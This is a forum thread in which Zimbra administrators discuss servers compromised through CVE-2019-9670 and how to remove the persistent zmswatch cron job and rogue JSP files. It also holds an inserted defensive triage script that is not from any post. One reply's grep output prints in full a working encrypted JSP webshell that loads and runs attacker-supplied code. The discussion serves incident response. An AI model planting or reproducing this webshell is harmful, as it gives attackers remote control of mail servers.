CVE-2019-9670 being actively exploited (Hacked Server)

Stemond11
Posts: 4
Joined: Mon May 27, 2019 7:51 pm

Re: CVE-2019-9670 being actively exploited

Post by Stemond11 »

Hi ng

My Zimbra machine is compromised.
If I delete the zmswatch script and the zmswatch crontab, after a few hours the script returns.
How can I find the source malware?
How can I delete the script definitively?

Please help me!
Thanks, Stefano
tin
Posts: 11
Joined: Wed Jan 17, 2018 2:32 am

Re: CVE-2019-9670 being actively exploited

Post by tin »

Have a read over the whole thread... I'll give a few thoughts here, but this is not everything...

You've most likely got a cron job re-downloading the malicious script. There may also be malicious JS files scattered through the jetty/webapps folders.

I found uninstalling wget and curl stopped the scripts working to reinfect. This may give you a better chance to clean things up, but they may also use other tricks.

Start planning how you can migrate to a clean install on a clean OS. Do not assume you have cleaned it all out.

Disable SSH access from outside the local network if you are working on the same network the server is located on. Some of the attacks appear to have sent the zimbra SSH keys to the attacker, allowing them SSH access until you can regenerate those keys.
maxxer
Outstanding Member
Posts: 224
Joined: Fri Oct 04, 2013 2:12 am

Re: CVE-2019-9670 being actively exploited

Post by maxxer »

Stemond11 wrote:
Hi ng
How can I find the source malware?
How can I delete the script definitively?

Read the whole thread and/or the blog post linked here; you will find guidelines on how to clean up your system.
Stemond11
Posts: 4
Joined: Mon May 27, 2019 7:51 pm

Re: CVE-2019-9670 being actively exploited

Post by Stemond11 »

In a previous post the ZMCAT solution was posted.
I have zmswatch in crontab and after I delete/kill it, it comes back!

In /tmp, all request JSPs like this, every 30 seconds, are read-only:
WHY??

<Configure class="org.eclipse.jetty.webapp.WebAppContext">
  <Get name="securityHandler">
    <Set name="loginService">
      <New class="com.zimbra.cs.servlet.ZimbraLoginService">
        <Set name="name">Zimbra</Set>
      </New>
    </Set>
    <Set name="authenticatorFactory">
      <New class="com.zimbra.cs.servlet.ZimbraAuthenticatorFactory">
        <Set name="urlPattern">//downloads/*</Set>
      </New>
    </Set>
  </Get>
</Configure>
maxxer
Outstanding Member
Posts: 224
Joined: Fri Oct 04, 2013 2:12 am

Re: CVE-2019-9670 being actively exploited

Post by maxxer »

Stemond11 wrote:
In a previous post the ZMCAT solution was posted.
I have zmswatch in crontab and after I delete/kill it, it comes back!

It's the same infection, just more widely spread on the system. The cleanup steps are basically the same: first of all patch your system, then clean up all the mess: cron, unwanted JSPs and so on.
Stemond11
Posts: 4
Joined: Mon May 27, 2019 7:51 pm

Re: CVE-2019-9670 being actively exploited

Post by Stemond11 »

I have just deleted the crontab.
Where do I find the unwanted JSPs?
Here? /opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp

Thank you,
Stefano
elby
Posts: 16
Joined: Tue May 28, 2019 7:37 am

Re: CVE-2019-9670 being actively exploited

Post by elby »

maxxer wrote:
Stemond11 wrote:
In a previous post the ZMCAT solution was posted.
I have zmswatch in crontab and after I delete/kill it, it comes back!
It's the same infection, just more widely spread on the system. The cleanup steps are basically the same: first of all patch your system, then clean up all the mess: cron, unwanted JSPs and so on.

After:
===

What should I clean up?
How do I figure out which are the unwanted JSP files?

Thanks,
AB_Zimbra
Posts: 4
Joined: Sat May 25, 2019 12:52 pm

Re: CVE-2019-9670 being actively exploited

Post by AB_Zimbra »

Stemond11 wrote:
I have just deleted the crontab.
Where do I find the unwanted JSPs?
Here? /opt/zimbra/jetty-distribution-9.1.5.v20140505/work/zimbra/org/apache/jsp

Thank you,
Stefano

The infection creates new JSPs and edits existing ones with "control code". This way the attacker can remotely execute commands on your compromised system. Patching after infection is not enough; you need to find all those "backdoors" and remove them or replace them with the ones from the source (install packages).

Please read the blog on maxxer's site, which he linked to at the start of this topic.

This might be hard if you're not an experienced sysadmin. Maybe this will help you to find those files:

Code:

grep -R '(request\.getParameter.*' /opt/zimbra/mailboxd
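An added triage helper (not Zimbra's code and not from any post in this thread) that narrows AB_Zimbra's grep to files which both read request input and contain a class-loading or command-execution primitive, which is the shape of the XZimbra.jsp hit quoted later in the thread while a page like Offline_jsp.java, which only echoes a parameter, is not flagged; it also checks the zimbra crontab for the zmswatch re-download job tin describes. ZIMBRA_HOME, ZIMBRA_CRONTAB, the function names and the sample files in demo() are assumptions/constructed for the example.

```shell
#!/bin/sh
# Added triage helper (not Zimbra's code, not from the thread).
# These two paths are assumptions matching the locations quoted in the thread.
ZIMBRA_HOME="${ZIMBRA_HOME:-/opt/zimbra}"
ZIMBRA_CRONTAB="${ZIMBRA_CRONTAB:-/var/spool/cron/crontabs/zimbra}"

# Print JSP/Java files under $1 that read request input AND carry a
# class-loading or command-execution primitive. Requiring both drops benign
# hits (a page that only echoes a parameter) while keeping files with the
# XZimbra.jsp shape (getParameter + defineClass + BASE64Decoder).
find_suspect_jsp() {
    find "$1" -type f \( -name '*.jsp' -o -name '*.java' \) | while IFS= read -r f; do
        if grep -qE 'request\.getParameter|request\.getReader' "$f" &&
           grep -qE 'defineClass|Runtime\.getRuntime|ProcessBuilder|BASE64Decoder' "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Print numbered crontab lines referencing zmswatch; silent if the file is absent.
find_zmswatch_cron() {
    grep -n 'zmswatch' "$1" 2>/dev/null || true
}

# Self-contained demo on constructed files, so it runs without a Zimbra install.
demo() {
    tmp=$(mktemp -d)
    mkdir -p "$tmp/webapps/zimbra/js"
    # Constructed benign page: reads a parameter but loads no code.
    printf '%s\n' '<% out.print(request.getParameter("retryOnError")); %>' \
        > "$tmp/webapps/zimbra/js/Offline.jsp"
    # Constructed, inert fixture that only has the webshell's detectable shape.
    printf '%s\n' '<% request.getParameter("x"); loader.defineClass(b, 0, b.length); %>' \
        > "$tmp/webapps/zimbra/js/XZimbra.jsp"
    # Constructed crontab line of the kind the thread describes.
    printf '%s\n' '*/30 * * * * sh /opt/zimbra/log/zmswatch.sh' > "$tmp/zimbra.cron"
    echo "suspect files:"; find_suspect_jsp "$tmp/webapps"
    echo "cron entries:";  find_zmswatch_cron "$tmp/zimbra.cron"
    rm -rf "$tmp"
}

demo
# On a real host, run the same checks against the live paths:
# find_suspect_jsp "$ZIMBRA_HOME/mailboxd"; find_zmswatch_cron "$ZIMBRA_CRONTAB"
```

Every file it prints should be diffed against the copy in the install packages before deleting or replacing it, as AB_Zimbra advises.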
zimbraxtc
Posts: 10
Joined: Mon May 27, 2019 6:13 pm

Re: CVE-2019-9670 being actively exploited

Post by zimbraxtc »

Hello all!

I have the same issue on 8.6 on Ubuntu.

- added the patch
- cleaned /var/spool/cron/crontabs/zimbra (line at the end)
- cleaned /opt/zimbra/log/zmswatch and zmswatch.sh
- removed added email accounts (only one)
- changed the admin password for the zimbra user
- can't find any strange .jsp files
- cleaned the /opt/zimbra/data/tmp/.zmswatch.xxx files

zmswatch still keeps popping up...

After cleaning like above, zmswatch started without the Zimbra server running.

Any ideas or thoughts about this?
mqaroush
Posts: 42
Joined: Sun Aug 03, 2014 4:31 am

Re: CVE-2019-9670 being actively exploited

Post by mqaroush »

[root@xxxx ]# grep -R '(request\.getParameter.*' /opt/zimbra/mailboxd
/opt/zimbra/mailboxd/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp.ORG:<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
/opt/zimbra/mailboxd/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp:<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
/opt/zimbra/mailboxd/work/zimbra/org/apache/jsp/public_/Offline_jsp.java: out.print(request.getParameter("retryOnError"));

What does this mean???